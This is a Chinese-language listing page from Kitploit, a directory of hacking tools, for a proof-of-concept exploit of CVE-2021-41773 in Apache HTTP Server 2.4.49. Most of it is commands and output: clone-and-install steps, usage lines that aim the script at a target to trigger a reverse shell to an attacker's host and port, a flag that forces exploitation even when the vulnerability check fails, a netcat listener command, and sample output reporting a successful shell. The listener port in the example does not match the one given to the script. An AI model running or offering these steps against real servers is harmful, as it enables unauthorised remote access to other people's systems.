Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-41773 — CVE-2021-41773的概念验证漏洞利用程序,该漏洞是Apache HTTP Server 2.4.49中的路径遍历和远程代码执行漏洞。可自动执行漏洞检测和反向Shell载荷执行。 | Kitploit
工具/GitHubGitHub/adrianmafandy/cve-2021-41773
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubadrianmafandy/cve-2021-41773

CVE-2021-41773

CVE-2021-41773的概念验证漏洞利用程序,该漏洞是Apache HTTP Server 2.4.49中的路径遍历和远程代码执行漏洞。可自动执行漏洞检测和反向Shell载荷执行。

查看仓库
1210个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41773 - Apache HTTP Server 2.4.49 路径遍历与远程代码执行

Security Platform Language

📖 描述

这是针对 CVE-2021-41773 的概念验证(PoC)漏洞利用脚本,该漏洞是 Apache HTTP Server 2.4.49 中的路径遍历与远程代码执行漏洞。

漏洞详情

  • CVE:CVE-2021-41773
  • 受影响版本:Apache HTTP Server 2.4.49
  • 漏洞类型:路径遍历 → 远程代码执行

🚀 使用方法

安装

root@kitploit:~
git clone https://github.com/adrianmafandy/CVE-2021-41773
cd CVE-2021-41773
pip install requests

基本用法

root@kitploit:~
# Basic syntax
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT>

# Force exploitation even if vulnerability check fails
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT> -f

示例

root@kitploit:~
# Basic syntax
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

# Force exploitation even if vulnerability check fails
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337 -f

设置监听器

在运行漏洞利用脚本之前,请先设置一个 netcat 监听器:

root@kitploit:~
nc -lvnp 4444

预期输出

root@kitploit:~
$ python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

     ______
    (_____ \
     _____) ) _ _ ____   ____ ___   ____
    |  ____/ | | |  _ \ / ___) _ \ / _  |
    | |    | | | | | | | |  | |_| ( (_| |
    |_|     \___/|_| |_|_|   \___/ \___ |
                                  (_____|

       Apache2 2.4.49 - CVE-2021-41773

   
[*] Checking if target is vulnerable...
[+] Target is VULNERABLE!
[*] Executing reverse shell payload...
[+] Reverse shell payload executed successfully!
[*] Check your listener
下载工具